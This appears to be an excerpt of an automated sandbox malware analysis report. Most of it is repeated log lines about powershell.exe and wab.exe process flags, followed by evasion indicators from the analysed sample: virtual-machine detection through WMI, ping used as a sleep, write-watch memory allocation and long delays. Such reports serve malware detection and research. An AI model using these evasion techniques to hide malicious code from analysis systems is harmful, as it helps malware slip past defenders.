Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Uses ping.exe to sleep
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 580000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 24570000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 26570000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599782 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599658 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599172 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598452 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598081 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597723 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597141 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596922 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596811 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595110 Jump to behavior
